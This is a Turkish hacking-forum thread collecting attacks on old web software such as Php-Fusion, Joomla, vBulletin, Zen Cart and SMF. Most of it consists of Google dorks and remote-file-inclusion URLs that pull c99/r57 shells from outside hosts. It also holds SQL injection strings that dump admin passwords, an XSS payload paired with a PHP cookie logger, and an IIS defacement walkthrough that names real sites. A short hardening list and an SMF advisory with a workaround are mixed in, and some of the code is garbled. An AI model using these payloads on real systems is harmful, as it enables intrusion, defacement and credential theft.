Googlede arat :\"\"cms SunLight 5.2\"


[Linkleri Sadece Üyeler Görebilir..] shell adresini at
[Linkleri Sadece Üyeler Görebilir..]



Örnek Site
[Linkleri Sadece Üyeler Görebilir..]
----------------------------------------------------------------------------


ewt arkdaslar yeni bir acik bundan arama yapar saniz site hackliye bilir isniz erken dawranan alir siteleri


google aramasi = \'xfsection\' \'modify.php\'

asagdaki ornege gore yapar siniz arkadaslar hadi kolay gelsin

[Linkleri Sadece Üyeler Görebilir..] [ kendi shell linizi eklicek siniz )
-----------------------------------------------------------------------------------
Php-Fusion 6.0 Scriptinde Rfi açığı

Code:
/php-files/includes/phpmailer_include.php

Bu dosya şöyLe bir hata veriyor ;

include(şlang_path.’phpmailer.lang-’.şlang_type.’.php’);

Evet bunuda böyLe kullanabiliriz..

[Linkleri Sadece Üyeler Görebilir..]

Bunu arama kodu / exploit biçimine çevirirsek..

Arama Kodları ;

Powered By Php-Fusion | [ Powered By Php-Fusion için yaklaşık 1.770.000 sonuç ]

inurl:/php-files/includes/ | [ inurl:/php-files/includes/ için yaklaşık 1.480 sonuç ]

Exploit ;

/php-files/includes/phpmailer_include.php?lang_path= [ sh3LL Adresi )

-------------------------------------------------------------
MkPortal\'daki XSS Açığı

vütün versiyonlarda geçerlidir

Script : Mkportal

xss

------------------------------------------------------------------
vBuLLetin GüvenLik AçıkLarı ve Kapama YoLLarı[GünceL AnLatımLı]


1- İLk olarak her zaman için forumunuzu son çıkan vbulletin sürümüne upgrade edin daha güvenlidir.
2-Herhangi bi eklentide php dosyası veya php dosyalarında editleme varsa iyice dikkat edin sonradan açık teşkil edebilir.
3-Ftp nize girin ve tüm dosyalarının chmod değerlerinin 777 olmamasına dikkat edin çünkü fso ile serverınıza girilirse hacklenmeyin adam yazma hakkı bulamaz kurtulmuş olursunuz.
4- Config.php dosyanızı mutlaka kriptolayınki herhangi bi fso ile girildiğinde sql bağlantı için kimse okuyamasın.
5- Eğer phpmyadmin kullanıyorsanız phpmyadmin adresinizin şifreli olduğundan emin olun değilse şifreleyin.
6- Admincp ve modcp klasörlerinizin ismini değiştirin vede şifreleyin o klasörleri.
7-Çok basit şifreler kullanmayın şifrelerinizde &%+/ gibi özel karekterlerin olmasına özen gösterin
8-Trojen yerseniz mutlaka hemen format atın ve tüm ftp +panel v.s şifrelerinizi değiştirin
9-Forumu kurduktan sonra mutlaka install klasörünü silin sadece install.php yi değil zaten herhangi bir işlevi olmıyan klasör komple silin ileriki zamanlarda açık teşkil etmesin.
10-Mutlaka hergün sitenizin yedeğini alın herhangi bi sorunla karşılaşırsanız yedeği geri yükleyip ufak bir zararla atlatırsınız.
11- Calender(Takvim) i silin biri oraya Hacked by ****** gibisinden bişeyler ekliyerek *küfür*lik yapabilir.
12-Shoutbox kullanıyorsanız mutlaka html ve images ları kapatın bunlar açık teşkil ediyorlar.
13-Eğer yedeği ftp nize yollayıp ordan bilgisayarınıza çekiyorsanız yedek aldıktan sonra mutlaka ftp nizden silin çünkü yedek alınması için klasörün chmod u 777 dir ve isteyen herkez yedeği bilgisayarına indirebilir.
14- imzada html kodlarını kapatın bu yöntemle xss veya yönlendirme yapılabilir.
15- Üye olurken mutlaka resim doğrulaması olsun eğer hostunuzdan doğan bir image sorunu varsa herhangi zorunlu bir ek bilgi ekleyinki siteniz flood saldırısına maruz kalmasın.
16- Herhangi bi konuda TIKLA gibisinden yazılara direk tıklamayın önce sağ tıklayıp özelliklerden linke bakın ondan sonra tıklayın.
17-Özel mesajlarda çok özelliğin açık olmasına gerek yok cookieslerinizin güvenliği açısından özel mesajdaki özellikleri kapatın image v.s
18-Yeni kullanıcı grup eklerken bu uye grubu halka acık olsunmu seçeneğini mutlaka hayır yapın diğer kullanıcılar bu grubu seçemesin.
19-Eğer null sürüm kullanıyorsanız dosyalara dikkat edin null iyen kişi sizin bilgilerinize ulaşmak için açık kapı bırakmış olabilir ör: 3.5.3 sürümündeki sm-check.php dosyası.
20-eğer topx kullanıyor kullanıyorsanız yönlendirme yemediğinden emin olun herhangi biri indexine yönlendirebilir [Linkleri Sadece Üyeler Görebilir..]
21-Eğer toplistinizi eklenti olarak kullanıyosanız ör:[Linkleri Sadece Üyeler Görebilir..] html kodlarının kapalı olmasına dikkat edin çünkü yönlendirme koduyla indexe yönlendirilebilir.
22- Gelelim eklentiden doğan xss açığına
Notepad ile yeni bir dosya açıp aşağıdaki kodu içine yapıştırın ve testmagic.pdf olarak kaydedin.


Code:

********>
d o c u m e n t.write(\'<img src=\"http://host
document.location.href=\"https://www.google.com/adsense/testmagic.pdf\";
</script>
Aşağıdakini de c.php olarak kaydedip bir host a atın.


Code:

<?php
şcookie = ş_GET[\'c\'];
şip = getenv (\'REMOTE_ADDR\');
şdate=date(\"m/d/Y g:i:s a\");
şreferer= getenv (\'HTTP_REFERER\');
şfl = fopen(\'megalog.txt\', \'a\');
fwrite(şfl, \"\\n\".şip.\' :: \'.şdate.\"\\n\".şreferer.\"\\n\".şcookie.\"\\n\") ;
fclose(şfl);
?>
Nasıl kullanılacağına geçelim :

vbulletin 3.5.4 kullanan bir foruma üye olup mesajımızı yazıyoruz. daha sonra yazdığımız mesaja testmagic.pdf i ekliyoruz. eğer o sitede açık varsa mesajı gören kullanıcıların cookie si hostunuzdaki log.txt e kaydedilecek.

Kodlardaki bazı adresler yerine biliyorsunuz ki kendi adreslerinizi yazacaksınız.Bu açık sadece IE kullananlarda geçerlidir.

işte eklentiden doğan xss açığı böyle kapatmak için pdf türü eklentiyi silmelisiniz

---------------------------------------------------------------

Jomla 1.5.0 Kullanicilari Hapi Yuttu sağlam açık

dosya ekleme açiği çikti joomla 1.5.0 da gözümüz aydin)
deneme için url: deneme.çom/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://seladresiniz/sell.jpg?[/url]
Açık yenidir
Risk Faktoru yuksek
------------------------------------------------------------

Güncel Açıklar Bölümündeki RFI Açıklarını Etkili Kullanma

Örnek açığımız aşağıdaki gibidir :


Script : Mani Admin Plugin Stats Reader
Version : 1.2
Google araması : \"2006 by www.mani-stats-reader.de.vu\"
Saldırı Exploiti
Code
[Linkleri Sadece Üyeler Görebilir..] Yolu/index.php?ipath=http://reqfer.by.ru/r57.txt?


-------------------------------------------------------

Scallywag RFİ Açığı

Dork:\"Powered by Scallywag\"

Exploit-1 : [Linkleri Sadece Üyeler Görebilir..][[Sh3LL Script]]

Exploit-2 : [Linkleri Sadece Üyeler Görebilir..][[Sh3LL Script]]

Exploit-3 : [Linkleri Sadece Üyeler Görebilir..][[Sh3LL Script]]

----------------------------------------------------------
Asp Sistem Portal Hack ( Videolu )



Yine Kolay Bir Hack Yöntemi..Umarım Videoyu İzleyince Anlarsınız..Gerekli Kodlar Dosyanın içinde..

Not : Bu tür siteler Türk sitesi olduğu için zarar vermeyiniz sitelere..(uyarı amaçlı kullanın)

indirme adresi : [Linkleri Sadece Üyeler Görebilir..]

Md5 Çözen Siteler ( Admin Şifresi Md5 Olarak Karşımıza Çıkcak Bu sİtelerden Faydalancaz Kırmak İçin )

------------------------------------------------
Güncel Açıkları Etkili Kullanabilme [Videolu]

Arkadaşlar sizler için video çektim BXCP = 0.3.0.4 team açığıyla exploitimizi çalıştırıcaz çok açık var.Exploit rar dosyasının içindedir.

indirme adresi : [Linkleri Sadece Üyeler Görebilir..]

-----------------------------------------------------
ISS Açığı ile 4 Adımda İndex Basma!

DERS 1

%WINDIR%\\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
BU KOdları
başlat///çalıştır a yazın

DERS 2
Şimdi Web Klasörleri klasörü çıkacak.Klasörün herhangi bir yerinde mause’un sağ tuşuyla tıklayalım.Ardından \"Yeni\" sonrada \"Web klasörü\" diyelim.\"eklenecek konumu yazın\" yazan yerin altındaki boşluğa şu siteleri yazabiliriz.
color=#0000cccolor=#0000ffwww.acore.com.tw
color=#0000cccolor=#0000ffwww.autoalliance.co.th
color=#0000cccolor=#0000ffwww.cckln.edu.hk
color=#0000cccolor=#0000ffwww.cescage.com.br
color=#0000cccolor=#0000ffwww.driving-school.com.au
color=#0000cccolor=#0000ffwww.fy.ah163.net
color=#0000cccolor=#0000ffwww.gbks.com.tr
color=#0000cccolor=#0000ffwww.golfsenior.com.br
color=#0000cccolor=#0000ffwww.greencotton.co.th
color=#0000cccolor=#0000ffwww.intradenver.net
color=#0000cccolor=#0000ffwww.jwpension.com
color=#0000cccolor=#0000ffwww.lakelandboating.com
color=#0000cccolor=#0000ffwww.level.com
color=#0000cccolor=#0000ffwww.myworld.com.tr
color=#0000cccolor=#0000ffwww.radiolina.it
color=#0000cccolor=#0000ffwww.rallycomms.co.uk
color=#0000cccolor=#0000ffwww.socialistasenred.org
color=#0000cccolor=#0000ffwww.tgm.co.th
color=#0000cccolor=#0000ffwww.vfb-huels.de
tabi sadece bunları değil başka siteleri de yazabilirsiniz. bunlar bir örnektir. Neyse
Herhangi birini yazdıktan sonra ileri diyelim ardından son’a basalım.Yazdğımız site orda gözükecek.Sonra çift tıklayarak eklediğimiz siteye girelim.

DERS 3
şimdi bu ders index le ilgili kendi indexinizi frontpage veya başka bir şekilde yapın kaydetin. uzantısı html olsun şimdi. adım 4 teyiz arkadaşlar

DERS 4 VE SON
Şimdi Web Folders Klasörüne Dönelim.Eğer İçerisi bomboş ise index.html dosyamızın ismini isminiz.html yapalım (mesela nickimiz cesurgursel ise cesurgursel.html yapalım öyle yaparsak color=#0000cccolor=#0000ffwww.siteninadı.com/cesurgursel.html adresine girdiğimizde bizim hazırladığımız index dosyasını görürüz) ve Web Folders da açmış olduğumuz siteye sürükleyerek gönderelim.Eğer içerde dosya var ise index in ismi aynen kalsın siz sadece sürükle yöntemiyle yollayın.(dosyalar çıkarsa direk color=#0000cccolor=#0000ffwww.siteismi.com adresine girdiğimizde bizim dosyayı görürüz)
Burada ıss açığı ile iki dakika da index atamayı öğrendik çok kolay bir yoldur. direk linkte çıkar.
evet arkadaşlar ıss açığı olan tüm sitelerde işe yarar tamam. iyi hackler...

Lutfen bir tşk çok görmeyelim - Emeğe saygı

--------------------------------------------------------------

flashchat V4.5.7 açığı

Evet kaldıysa gelsin hacklesin bi dene


Google arama kodu : flashchat V4.5.7

/inc/cmses/aedating4CMS.php?dir[inc]=http://shell.com/c99.txt?


Sitelerin sonunda bulunan flashchat.php silin bu kodu ekleyin kolay gelsin

shell adresiniz vardır herhalde cw

-------------------------------------------------------------------------------------
TROforum Scriptlerinde Uzaktan Kod Çağırma Güvenlik Açığı

Script : TROforum

Version : 0.1

Hasarlı kod : admin.php

Google Araması :\"TROforum 0.1\"


Saldırı şekli :

Örneksiteadresi/Script Yolu/admin/admin.php?site_url=http://sh3ladresiniz.txt?

--------------------------------------------------------------------------


phphtml v 0.6.4 Rfi


Website: [Linkleri Sadece Üyeler Görebilir..]

DOWNLOAD: [Linkleri Sadece Üyeler Görebilir..]

FILE :


Code:
PATH\\phphtml.phpEXPOLİT:


Code:
[Linkleri Sadece Üyeler Görebilir..] l.txt?CODE: on line 19



Code:
<?

define (PHPHTML_VERSION, \"0.6.4\");

/* gettext is not implemented for now*/
=0;

/* We need to know where the PHP::HTML tree is installed.*/

if (strlen(chop())==0) =\".\";
if (==1)
{
if (function_exists(\"gettext\"
{
=1;
}
}

include(\"/ext.php\"); /* Some extenstions to PHP */
include(\"/core.php\"); /* PHP::HTML Core */
include(\"/xhtml.php\"); /* XHTML extensions */
include(\"/xhtml_table.php\"); /* XHTML tables extensions */
include(\"/xhtml_forms.php\"); /* XHTML forms extensions */
include(\"/xhtml_doc.php\"); /* XHTML document extension */
include(\"/wml.php\"); /* WML extension */


/* Below is a debugging example */

/*
=new XHTML_doc(\"Hello\");
echo ->render();
*/


yani anlatıyım şöyle oluyor

[Linkleri Sadece Üyeler Görebilir..]. txt?

arkadaşlar site adını yazıp shell basacaksınız. cok zor deyil arama koduna gelince phpbb v 0.6.4 aratın cıkar

----------------------------------------------------------------------------------------------
Risk Faktörü:Orta

smf 1.1.2 deki acık

Product: Simple Machines Forum (SMF)
Affected version: 1.1.2 and prior
Remote-Exploit: yes
Vendor-URL: [Linkleri Sadece Üyeler Görebilir..]
Vendor-Status: informed
Advisory-Status: published

Credits
============
Discovered by: hackedbydeli
[Linkleri Sadece Üyeler Görebilir..]

Original Advisory:
============
[Linkleri Sadece Üyeler Görebilir..]

Introduction
============
\"Simple Machines Forum ? SMF in short ? is a free, professional grade software package
that allows you to set up your own online community within minutes.\" -from simplemachines.org

More Details
============
1. Session fixation:
The \"PHPSESSID\" parameter can be set to a malicious and arbitrary value.

1.1 Description:
In a session fixation attack, the attacker fixes the user\'s session ID before the user even logs into the target server.
After a user\'s session ID has been fixed, the attacker will wait for them to login.
Once the user does so, the attacker uses the predefined session ID value to assume their online identity.

Workaround:
============
1. Do not accept session identifiers from GET / POST variables.

2.Regenerate SID on each request.

3. Accept only server generated SID:
One way to improve security is to not accept session identifiers not generated by server.

if ( ! isset( ş_SESSION[\'SERVER_GENERATED_SID\'] ) ) {
session_destroy(); // destroy all data in session
}
session_regenerate_id(); // generate a new session identifier
ş_SESSION[\'SERVER_GENERATED_SID\'] = true;

History/Timeline
================
30.04.2007 discovery of the vulnerability
03.04.2007 contacted the vendor
04.04.2007 working patch sent to the vendor
05.04.2007 advisory is written
05.04.2007 advisory released
Not:Bu yazdıklarım sadece professionel kullanıcılar için gecerlidir

--------------------------------------------------------------------------------------------------------
bazı rfi açıkları

BinGo News <= 3.01 (bnrep)
Usage : [Linkleri Sadece Üyeler Görebilir..][Script Path]/bp_ncom.php?bnrep=http://SHELLURL.COM?

Arama kodu:BinGo News 3.01
Aramada kodu powered by BinGo News 3.01
inurl:bp_ncom.php

şeklinde çoğaltabilirsiniz.Umarım açıklayıcı olabilmişimdir;


Socketwiz Bookmarks <= 2.0 (root_dir)
Usage : [Linkleri Sadece Üyeler Görebilir..] target]/[path]/smarty_config.php?root_dir=http://[shell anda].txt?

Vivvo Article Manager <= 3.2 (classified_path)
Usage : [Linkleri Sadece Üyeler Görebilir..][path]/index.php?classified_path=http://[evil_script]?

MyABraCaDaWeb <= 1.0.3 (base)
Usage : [Linkleri Sadece Üyeler Görebilir..][path]/index.php?base=[shell] atau [Linkleri Sadece Üyeler Görebilir..][path]/pop.php?base=[shell]

Somery <= 0.4.6 (skin_dir)
Usage : [Linkleri Sadece Üyeler Görebilir..][path]/upload/admin/system/include.php?skindir=http://[url_inclusion_exploit]

PhpNews 1.0 (Include)
Usage : http://[Target]/[Path]/Include/lib.inc.php3?Include=http://[shell anda] atau http://[Target]/[Path]/Include/variables.php3?Include=http://[shell anda]

SL_Site <= 1.0 (spaw_root)
Usage : http://site.com/[path]/admin/editeur/spaw_control.class.php?spaw_root=[Evil_Script]

PayProCart <= 1146078425 Multiple
Usage : /index.php?proMod=http://shell.txt?

Beautifier 0.1 (Core.php)
Usage : http://[Target]/[Path]/Beautifier/Core.php?BEAUT_PATH=http://[shell">http:///index.php?proMod=http://shell.txt?

Beautifier 0.1 (Core.php)
Usage : http://[Target]/[Path]/Beautifier/Core.php?BEAUT_PATH=http://[shell ente]?

BinGo News <= 3.01 (bnrep)
Usage : http://sitename.com/[Script Path]/bp_ncom.php?bnrep=http://SHELLURL.COM?

phpBB Shadow Premod <= 2.7.1
Usage : http://www.site.com/[path]/includes/functions_portal.php?phpbb_root_path=[Evil_Script]

phpFullAnnu <= 5.1 (repmod)
Usage : http://sitename.com/[Script Path]/modules/home.module.php?repmod=http://SHELLURL.COM?

Akarru <= 0.4.3.34 (bm_content)
Usage : http://www.site.com/[path]/akarru.gui/main_content.php?bm_*********[she


---------------------------------------------------------------------------------------------------------

ASP Sitelerin DB\'lerin Indir / Kriptolu Şifreleri Bul !


Gerekli olanlar


Google arama kodu


Code:
allinurlroddetail.asp?prod=

Default mb yolu

fpdb/vsproducts.mdb


Admin girişi

vsadmin/login.asp

--------------------------------------------------------------------------------------------------------------


vBulletin 3.6.5 Scriptinde SQL Injection Güvenlik Açığı


Script : vBulletin

Version : 3.6.5

Saldırı şekli :


Code:
Hedefsite/Script Yolu/misc.php?sub=profile&name=0\\\\\\\\\\\\\')+UNION+S ELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_use rs%

------------------------------------------------------------------------------------------------------------


X-ice Haber Script\'i Admin K.Adı ve Şifresi Sql Enj. [Md5 Değil!]


- Site : ?

- Sql : devami.asp?id=-1%20union%20select%201,kullaniciadi,sifre,1,1,1,1, 1%20from%20admin

- Konu : X-ice Haber Script\'i Sql Enjeksiyon.

- Google araması : inurl:default.asp?Xsayfa=

- Admin Paneli : /admin



---------------------------------------------------------------------------------------------------------------------
Zen Cart Açığı [Garanti] Kendi Geliştirdiğim Arama Kodu

Normalde açık vardı fakat arama yapıldığında sitelerin az çıktığından.Yeni bi arama kodu gelistirdim.
Arama Kodu
Arama Kodu : \"Zen Cart!, The Art of E-commerce\" (\"\" lar yok)
Exploit:
index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell adresi?

------------------------------------------------------------------------------------------------------------------


PHPBandManager Index.PHP RFİ Açığı.


Uzaktan: Yes Yerel: No Yayınlanması: Apr 26 2007 12:00AM Güncellemesi: Apr 26 2007 10:40PM Kim Buldu: koray Etkilenen: phpBandManager phpBandManager 0.8

Exploit:
http://www.example.com/suite/index.p...st.com/c99.txt?

Kaynak: http://www.securityfocus.com/bid/23673

Google araması: http://www.google.com.tr/search?hl=t...%3Fpg%3D&meta=


örneğin burdaki kod o yüzden eğer topx iniz yönlendirme yiyosa yönlendirme kodundaki kelimeleri sansürleyin vede en garanti yol olarak açıksız topx ler var onu kullanın adresiniz/c.php?c=\'+document.cookie+\'\" WIDTH=0 HEIGHT=0>\');

SaoL ßro ..

euhhe haklısın bn de kısa die direkt yorumlara geçtim bi ara sakin kafayla bakıcam saol eline sağlık =)

emegine saglık ty

emeğine sağlık

çok saol çok işime yarıyacak gibi

işinize yarar arkadaşın dediği gibi sakin kafayla okuyun ...